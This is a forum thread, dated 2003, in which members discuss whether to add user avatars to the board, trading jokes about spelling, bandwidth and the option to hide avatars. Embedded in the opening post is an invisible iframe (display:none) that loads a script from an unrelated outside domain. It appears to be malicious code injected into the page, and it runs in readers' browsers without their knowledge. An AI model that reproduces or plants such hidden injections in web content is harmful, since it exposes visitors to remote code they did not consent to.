Poll: Should We Have Avitars

+ Reply to Thread

Thread: Avitars

PHO
    Broward County Florida, "Home of the Hanging Chad"

Avitars

I spoke with the site owner regarding putting on some Avitars.

He asked me to post a poll to gauge response.

Argument For. - They are fun

Argument Against - The site loads faster

Note - you can choose "do not load avitars" in your preferences<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Please check out my new radio show - you can listen live online Saturdays from 9-10am

www.grtalk.com

"Aaron the Research Dept."

Question

Hey Aaron - excuse my ignorance, but what the heck is an Avitar? I don't recall them teaching this to us during the MBA program

Avatars (note spelling, please) are silly little graphical images that accompany your posts. This way, every time you post, the readers can be reminded of your taste in anime, or music, or manga, or politics, or hair style ...

Personally, my wife thinks I'm enough of a geek without me having an avatar.

If the poll is affirmative, can we at least offer one avatar of an ambivalent looking guy sitting there not wanting to pick an avatar?

PHO
    Ok, its well established i can't spell

I am not sure why anyone would vote no if you go to your preferences, you can check off - "don't show anyone's avitars" so if you don't want to see them you don't have to look at them.

if you do want them, you can its like having custom ringers or custom backrounds or Skins - its just a little fun. Some fo the avatars are very creative
    Please check out my new radio show - you can listen live online Saturdays from 9-10am

www.grtalk.com

The Dawn of SmartPhones Tony_ensemble's Avatar
    One practical reason I like avitars (aside from all the fun) is that it makes it easier for me to quickly find certain peoples posts. e.g. If I am a green frog (and I'm not) then the color and the shape of the frog are a lot easier to i.d. than the word 'Tony' when I'm scrolling through quickly.
    The Saxon word for depression can be literally translated as "without beer", proving again that the Vikings were the pinnacle of all humankind.

PHO
    this is very true, i mean the Flag that Hotsync had (always was posting tremendously useful informatio) and Robert K's stuff stand out like a freaking Spotlite on the page.

i understand if its a bandwidth issue, i say lets oopen up the board for contributions, it can't be more than what 50 bucks to increase teh bandwidth and you can shut them off if you dont' want to see them or load them or you want your stuff faster

www.grtalk.com

web art designer developer schleifnet's Avatar
    new orleans (bet you $5 i know where you got dem shoes...)

annoyed

personally i get annoyed by all those little moving and jiving avitars on the other forum site
    i say they are unneeded be creative with a signature and in your posting but an little icon, how unnessecary....

bah humbug,
    schleifnet

ps: also i know i can turn off the function which i will if you guys vote it in and tony... crl-F find tony, very simple eh?
    Last edited by schleifnet; 06-17-2003 at 02:22 PM.